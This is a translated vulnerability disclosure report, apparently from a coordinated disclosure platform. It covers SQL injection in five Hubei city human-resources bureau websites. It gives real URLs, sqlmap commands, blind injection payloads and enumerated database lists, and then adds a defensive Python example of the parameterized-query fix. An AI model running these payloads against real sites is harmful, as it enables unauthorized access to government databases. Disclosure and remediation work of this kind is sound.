2015-02-25: Details reported to the vendor; awaiting vendor handling
2015-03-02: Vendor confirmed; details disclosed to the vendor only
2015-03-12: Details disclosed to core white hats and domain experts
2015-03-22: Details disclosed to regular white hats
2015-04-01: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public

Browsing around in my spare time, I came across what looks like a generic (multi-site) vulnerability. This is my first time submitting a generic one, so I am a bit nervous.

I searched Google for the keywords and then added a few of my own; so far I have found 5 sites with this problem.
Hanchuan City Human Resources and Social Security Bureau (汉川市人力资源和社会保障局)
http://www.hbhc12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp?zxlb=01
---
Place: GET
Parameter: zxlb
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zxlb=01%' AND 5239=5239 AND '%'='

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: zxlb=01%' AND 9625=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(69)||CHR(79)||CHR(67),5) AND '%'='
---
web application technology: Servlet 3.0, JSP, JSP 2.2
back-end DBMS: Oracle
Databases:
available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBWZ
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Shishou City Human Resources and Social Security Bureau (石首市人力资源和社会保障局)
http://www.ss12333.com/hbwz/qtpage/hdjl/zxzx_ckhf.jsp?zxlb=01
---
Place: GET
Parameter: zxlb
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zxlb=01%' AND 6505=6505 AND '%'='

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: zxlb=01%' AND 9902=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(71)||CHR(87)||CHR(65),5) AND '%'='
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
Suizhou City Human Resources and Social Security Bureau (随州市人力资源和社会保障局)
sqlmap -u "http://www.hbsz12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp" --data "op=88952634&zxlb=02&card=88952634&name=88952634" --dbs
---
Place: POST
Parameter: zxlb
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: op=88952634&zxlb=02%' AND 9816=9816 AND '%'='&card=88952634&name=88952634

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: op=88952634&zxlb=-4497%' OR 9386=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(84)||CHR(84)||CHR(101),5) AND '%'='&card=88952634&name=88952634
---
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
Databases:
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBWZ
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Xiangyang City Human Resources and Social Security Bureau (襄阳市人力资源和社会保障局)
sqlmap -u "http://www.xf12333.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp" --data "op=88952634&zxlb=02&card=88952634&name=88952634" --dbs
---
Place: POST
Parameter: zxlb
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: op=88952634&zxlb=02%' AND 7291=7291 AND '%'='&card=88952634&name=88952634

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: op=88952634&zxlb=02%' AND 4905=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(84)||CHR(112)||CHR(70),5) AND '%'='&card=88952634&name=88952634
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
Databases:
available databases [14]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBWZ
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Xiaogan City Human Resources and Social Security Bureau (孝感市人力资源和社会保障局)
sqlmap -u "http://www.hbxg12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp" --data "op=88952634&zxlb=02&card=88952634&name=88952634" --dbs
---
Place: POST
Parameter: zxlb
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: op=88952634&zxlb=02%' AND 9313=9313 AND '%'='&card=88952634&name=88952634

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: op=88952634&zxlb=02%' AND 7470=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(80)||CHR(115)||CHR(75),5) AND '%'='&card=88952634&name=88952634
---
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
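All five results above show the same defect: the zxlb value is spliced into a quoted LIKE literal, so a value that closes the quote (the report's own payload 01%' AND 5239=5239 AND '%'=') is executed as part of the WHERE clause, and sqlmap detects it from the difference between a true and a false condition. The script below is an added example, not code from the report or from the affected sites; it uses an in-memory SQLite table in place of the Oracle backend, and the table name zxzx and its columns are assumptions. It puts the concatenated query next to the parameterized fix and includes the true/false differential check, which a defender can keep as a regression test for this endpoint.

```python
import sqlite3

# Constructed sample data standing in for the consultation-category lookup;
# the table name "zxzx" and the column names are assumptions, not from the report.
ROWS = [("01", "policy question"), ("02", "complaint"), ("03", "suggestion")]

# The boolean-based payload from the report, plus a false variant of it.
TRUE_PAYLOAD = "01%' AND 5239=5239 AND '%'='"
FALSE_PAYLOAD = "01%' AND 5239=5240 AND '%'='"


def connect():
    """Fresh in-memory database (SQLite stands in for the Oracle backend)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zxzx (zxlb TEXT, title TEXT)")
    conn.executemany("INSERT INTO zxzx VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, zxlb):
    """The pattern behind the report: the request value is concatenated into
    the quoted LIKE literal, so a value containing a quote rewrites the WHERE
    clause. The defect is kept on purpose so it can be compared with the fix."""
    sql = "SELECT title FROM zxzx WHERE zxlb LIKE '" + zxlb + "%' ORDER BY zxlb"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value):
    """Escape LIKE metacharacters so user input cannot widen the match either."""
    return (value.replace("\\", "\\\\")
                 .replace("%", "\\%")
                 .replace("_", "\\_"))


def lookup_parameterized(conn, zxlb):
    """Fix: bind the value as a parameter; the quote and the AND are plain data."""
    sql = "SELECT title FROM zxzx WHERE zxlb LIKE ? ESCAPE '\\' ORDER BY zxlb"
    return [row[0] for row in conn.execute(sql, (escape_like(zxlb) + "%",))]


def is_injectable(lookup):
    """Regression check mirroring sqlmap's boolean-based test: a true and a
    false condition must not change the result set. Returns True when the
    lookup leaks the difference, i.e. when the injected condition is evaluated."""
    conn = connect()
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    for name, fn in (("concatenated", lookup_vulnerable),
                     ("parameterized", lookup_parameterized)):
        print(f"{name}: injectable={is_injectable(fn)}")
```

The parameterized version also escapes % and _ before appending the trailing wildcard; binding alone stops the quote from breaking out of the literal, but without escaping a bare % would still let a caller turn the prefix match into a match-everything.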
Proven; please go easy on me!

Over to you!

Severity: High
Vulnerability Rank: 20
Confirmed: 2015-03-02 16:01
CNVD confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Hubei branch center, which will coordinate handling with the website's operating unit.
None yet